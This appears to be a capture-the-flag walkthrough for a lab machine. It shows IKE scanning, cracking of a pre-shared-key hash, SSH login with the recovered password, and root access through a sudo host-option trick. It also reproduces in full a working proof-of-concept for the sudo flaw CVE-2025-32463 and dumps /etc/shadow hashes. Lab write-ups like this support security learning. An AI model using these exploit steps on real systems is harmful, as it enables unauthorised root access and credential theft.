Enum
This machine we needed to also perform UDP scans.
$ export IP=10.129.238.52
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn; rustscan --udp -a $IP --ulimit 5000
*snip*
Open 10.129.238.52:22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Open 10.129.238.52:500
PORT STATE SERVICE REASON
500/tcp closed isakmp reset ttl 63
User
$ ike-scan -M -A -P -R $IP
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.238.52 Aggressive Mode Handshake returned
HDR=(CKY-R=a2de72105ab132d4)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
c4a410bbd91162a544ad85cfad85630f9e18970d767b999f037af8409ed4b1212ebfcec3300c0bf2dfaafb999bfde2e335d900fa94560419f07e64fde75745a6f104f70eeff10ffb1ea8398d3692a5605a75eceb105c9c12494486bd6bdbae6767ee6399253e454641a18409a0d921c69059a40bf926fdc4a9db4b09f099ddac:35ea9e821c9f8e40ce3ec880b11153a6c364c3e587bdc281333439dd41bafdd324c6c68164b2eaae7e49634ff464fdc03950f3ff5c10fb5a0dc7234735bb05a43f16a7e70c06a0df14ea669fbb36cff9094b3f7ab72879deb3b279e8f18b943aa74859b860dfff50563752cc6315e80cd1a7fa7bfef57f3e6acd49f54062be8b:a2de72105ab132d4:2408bc067f49a52b:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d6239eba25fb713efa73db0f3a6792c4568e8146:c22056d15f7b306dce339cacab61165732b15d907cd1c592630f910cef951257:de5cb205253b8f980ad8bc0ffba2b4259bcf3aa2
Ending ike-scan 1.9.6: 1 hosts scanned in 0.062 seconds (16.20 hosts/sec). 1 returned handshake; 0 returned notifyUser Account
ike@expressway.htb
- This hash always changes so grab your own
$ echo '2640570a53a6efed22e0750a005e31e84e91b7d38cf1a092cc4364cec667edc06fe91acd1d4879f3a7c13c390659beb7788c29f3e71ae54ddffe453d7eb2a04e1d5c2a33e3db3306bbd22bf141f6e7944730b6bd2a3b618a6d537ceb536dc68b9674a1aeaa69a9e851a3338bb7caafe813eb4cddd503708529938e25d60be7f6:4f975f9784e571eb46975aaac3bab7ce1b803f52afa81fff83961cba01a54fc5088caaf083506c6c46b237dd814ce469bf10873f3c51cd3a2f9cd43dd6b568cc949b3e4560a08acc694fa46a1f43704b7b49be4e137f596af1e1b3a3ced470f8f7bf02cd045bf20e9be04e468c3a3d851d26ef342cc9c9379481bd5402ae9d02:fd979768b7598749:6739d06bc0d42dfc:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:36af7a7b34a9043172a1232b00a46a1e293a439c:39a26abc795984ac51975c7e00bad137ce486fc895879a32dc56699f9c9f512b:af3c54b27bd43cb822e41f5f7a55ea45d9886994' > hash.txt
$ psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash af3c54b27bd43cb822e41f5f7a55ea45d9886994
Ending psk-crack: 8045040 iterations in 3.916 seconds (2054489.54 iterations/sec)- SSH in as
ike
$ sshpass -p 'freakingrockstarontheroad' ssh ike@expressway.htbRoot
- No
sudo
ike@expressway:~$ sudo -v
Sorry, user ike may not run sudo on expressway.idreveals we are inproxygroup- Search for files/dirs under
proxyprivs
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ find / -group proxy -ls 2>/dev/null
1197 0 drwxr-xr-x 2 proxy proxy 40 Sep 20 21:01 /run/squid
17693 4 drwxr-xr-x 2 proxy proxy 4096 Sep 16 16:02 /var/spool/squid
15362 0 -rw-r----- 1 proxy proxy 0 May 16 01:24 /var/spool/squid/netdb.state
17150 4 drwxr-xr-x 2 proxy proxy 4096 Sep 16 16:02 /var/log/squid
17151 4 -rw-r----- 1 proxy proxy 941 Jul 23 01:47 /var/log/squid/cache.log.2.gz
17195 4 -rw-r----- 1 proxy proxy 20 Jul 22 19:32 /var/log/squid/access.log.2.gz
17207 4 -rw-r----- 1 proxy proxy 2192 Jul 23 01:47 /var/log/squid/cache.log.1
17222 8 -rw-r----- 1 proxy proxy 4778 Jul 23 01:19 /var/log/squid/access.log.1- We see some log files for Squid
- Reading
access.log.1reveals a new endpoint
ike@expressway:~$ cat /var/log/squid/access.log.1
1753229566.990 0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.379 0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.417 15 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
*snip*
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
*snip*
1753229760.722 0 192.168.68.50 NONE_NONE/400 3908 GET /frand2 - HIER_NONE/- text/html403 3807 GET http://offramp.expressway.htb- 403 error means the system recognizes this as valid
- Recall
Sorry, user ike may not run sudo on expressway. - Maybe we can get off the expressway, and use the offramp now.
ike@expressway:~$ sudo -h
sudo - execute a command as another user
usage: sudo -h | -K | -k | -V
usage: sudo -v [-ABkNnS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-ABkNnS] [-g group] [-h host] [-p prompt] [-U user]
[-u user] [command [arg ...]]
usage: sudo [-ABbEHkNnPS] [-C num] [-D directory]
[-g group] [-h host] [-p prompt] [-R directory] [-T timeout]
[-u user] [VAR=value] [-i | -s] [command [arg ...]]
usage: sudo -e [-ABkNnS] [-C num] [-D directory]
[-g group] [-h host] [-p prompt] [-R directory] [-T timeout]
[-u user] file ...
Options:
-A, --askpass use a helper program for password prompting
-b, --background run command in the background
-B, --bell ring bell when prompting
-C, --close-from=num close all file descriptors >= num
-D, --chdir=directory change the working directory before running
command
-E, --preserve-env preserve user environment when running command
--preserve-env=list preserve specific environment variables
-e, --edit edit files instead of running a command
-g, --group=group run command as the specified group name or ID
-H, --set-home set HOME variable to target user`s home dir
-h, --help display help message and exit
-h, --host=host run command on host (if supported by plugin)
-i, --login run login shell as the target user; a command
may also be specified
-K, --remove-timestamp remove timestamp file completely
-k, --reset-timestamp invalidate timestamp file
-l, --list list user`s privileges or check a specific
command; use twice for longer format
-n, --non-interactive non-interactive mode, no prompts are used
-P, --preserve-groups preserve group vector instead of setting to
target`s
-p, --prompt=prompt use the specified password prompt
-R, --chroot=directory change the root directory before running command
-S, --stdin read password from standard input
-s, --shell run shell as the target user; a command may
also be specified
-T, --command-timeout=timeout terminate command after the specified time limit
-U, --other-user=user in list mode, display privileges for user
-u, --user=user run command (or edit file) as specified user
name or ID
-V, --version display version information and exit
-v, --validate update user`s timestamp without running a
command
-- stop processing command line arguments- We can specify another host with
sudo -h - Since we saw another valid host let’s try that
- Need to pass
-ior-u root <CMD>for privesc
ike@expressway:~$ sudo -h offramp.expressway.htb -i
root@expressway:~$ id
uid=0(root) gid=0(root) groups=0(root)
OR
ike@expressway:~$ sudo -h offramp.expressway.htb -u root bash
root@expressway:/home/ike$
OR
ike@expressway:~$ sudo -h offramp.expressway.htb -u root /bin/sh -c 'cat /root/*.txt'
39a5f4ca65efe873121c191e5bab5678Root2
May be unintended
- Checking
sudoversion reveals CVE-2025-32463 might work
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$ nano pwn.sh#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}- Now make executable and run for
rootshell
ike@expressway:~$ chmod +x pwn.sh
ike@expressway:~$ ./pwn.sh
woot!
root@expressway:/$ id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)root@expressway:~# cat /etc/shadow
root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
ike:$y$j9T$iACv1qBHXsR1j0yqIsVwY.$udBwggnZtUPt/0TNMIhsU4TDrQm2tCzTr6xUE0ilPQ4:20292:0:99999:7:::